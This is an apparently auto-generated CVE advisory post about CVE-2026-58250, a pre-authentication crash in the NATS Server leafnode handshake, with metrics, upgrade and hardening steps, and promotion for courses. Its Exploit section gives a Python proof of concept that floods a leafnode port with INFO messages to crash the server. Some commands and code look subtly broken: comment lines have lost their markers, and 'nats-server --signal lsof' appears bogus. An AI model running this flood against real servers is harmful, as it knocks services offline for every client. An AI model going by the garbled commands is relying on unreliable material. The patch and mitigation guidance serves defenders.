NATS Server, Denial of Service (NULL Pointer Dereference), CVE-2026-58250 (High) -DC-Jul2026-927

Listen to this Post

How CVE-2026-58250 Works

NATS Server is a high‑performance messaging system designed for cloud and edge native environments. It supports a “leafnode” topology where remote NATS servers can connect to a central hub as if they were regular clients, enabling hub‑and‑spoke deployments across separate administrative domains. The leafnode listener is typically exposed on a dedicated port (e.g., 7422) and, by default, enables compression to optimise bandwidth.
The vulnerability resides in the pre‑authentication handshake phase of the leafnode connection. Before a remote peer is authenticated and its account is set up, the server processes incoming INFO protocol messages that negotiate connection parameters. If compression is enabled on the leafnode listener, an unauthenticated attacker with network access can send a sequence of specially crafted or repeated INFO messages during this handshake. The server’s parser attempts to handle these messages without having completed the necessary state initialisation, leading to a NULL pointer dereference in the Go runtime.
More concretely, the leafnode handshake expects a specific flow of messages. By flooding the listener with multiple INFO frames before the server has allocated the required structures for the session, the code path that processes the compression negotiation dereferences a nil pointer. This triggers a panic and crashes the server process. Because the attack occurs entirely before authentication, no credentials are required, and no user interaction is needed. The crash makes the NATS instance unavailable to all legitimate clients, resulting in a denial‑of‑service condition.
The issue affects all NATS Server versions prior to 2.11.17 and 2.12.8. It was introduced when compression support was added to leafnode listeners; the flaw is not present when compression is disabled. The fix in the patched versions ensures that the handshake state machine correctly validates the sequence of INFO messages and does not attempt to use uninitialised pointers, even when compression is negotiated.

DailyCVE Form:

Platform: NATS Server
Version: 2.11.16/2.12.7
Vulnerability: NULL Pointer Dereference
Severity: High (7.5)
Date: 2026-07-08

Prediction: Patch already available

What Undercode Say

Analytics

| Metric | Value |

|–|-|

| CVSS v3.1 Base Score | 7.5 (High) |

| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |

| CWE | CWE‑476 (NULL Pointer Dereference) |

| EPSS Probability | 0.73% (50th percentile) |

| Exploit Price Estimate | $0 – $5k |
| Attack Requirements | None (no special conditions) |

| Privileges Required | None |

| User Interaction | None |

| Availability Impact | High (complete service crash) |

Bash Commands & Verification

Check your NATS Server version:

nats-server --version
or
./nats-server --version

Verify if the leafnode listener has compression enabled (look for `compression: true` or absence of compression: off):

grep -A5 "leafnodes" /etc/nats-server.conf

Example vulnerable configuration (default compression):

leafnodes {
port: 7422
compression is implicitly on unless explicitly disabled
}

Safe configuration (workaround):

leafnodes {
port: 7422
compression: off
}

Check for active leafnode connections:

nats-server --signal lsof

Upgrade to the fixed version (using Go modules):

go get github.com/nats-io/nats-server/[email protected]
or
go get github.com/nats-io/nats-server/[email protected]

Exploit

An attacker can exploit this vulnerability by establishing a TCP connection to the leafnode port (default 7422) and sending repeated `INFO` protocol messages before the server completes authentication and account setup. A minimal proof‑of‑concept in Python:

import socket
import time
target = "192.168.1.100"
port = 7422
info_msg = b"INFO {\"server_id\":\"A\",\"version\":\"2.10.0\",\"go\":\"go1.22\",\"host\":\"0.0.0.0\",\"port\":7422,\"headers\":true,\"max_payload\":1048576,\"proto\":1,\"auth_required\":false,\"tls_required\":false}\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
Send multiple INFO messages rapidly before authentication
for _ in range(50):
sock.send(info_msg)
time.sleep(0.01)
sock.close()

Sending a flood of such messages triggers the NULL dereference, causing the server to panic and exit. No authentication is required, and the attack can be launched from any network‑reachable host.

Protection

  1. Upgrade to a fixed version – The only complete remedy is to update to NATS Server v2.11.17 or v2.12.8 (or later). These releases include the corrected handshake logic that prevents the NULL pointer dereference.
  2. Disable compression on leafnode listeners – If an immediate upgrade is not possible, set `compression: off` in the leafnode configuration block. This eliminates the vulnerable code path.
  3. Restrict network access – Use firewalls or security groups to limit access to the leafnode port (7422) to only trusted peer servers. This reduces the attack surface by preventing unauthorised network connections.
  4. Monitor for crashes – Implement logging and alerting for unexpected NATS server terminations. A sudden increase in crashes may indicate attempted exploitation.
  5. Consider disabling leafnode support – If your deployment does not require leafnode topology, remove the `leafnodes` configuration block entirely.

Impact

  • Denial of Service – Successful exploitation crashes the NATS server process, making the messaging system completely unavailable to all clients and services that rely on it.
  • Service Disruption – In production environments, this can lead to cascading failures in microservices, IoT edge devices, and cloud‑native applications that depend on NATS for real‑time communication.
  • No Data Loss or Leakage – The vulnerability only affects availability; confidentiality and integrity remain intact (CVSS impact: None/None/High).
  • Ease of Exploitation – The attack requires no credentials, no user interaction, and can be performed remotely over the network, making it a high‑risk issue for exposed leafnode listeners.
  • Widespread Exposure – Many NATS deployments enable leafnode compression by default, so unpatched instances are vulnerable unless explicitly hardened.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top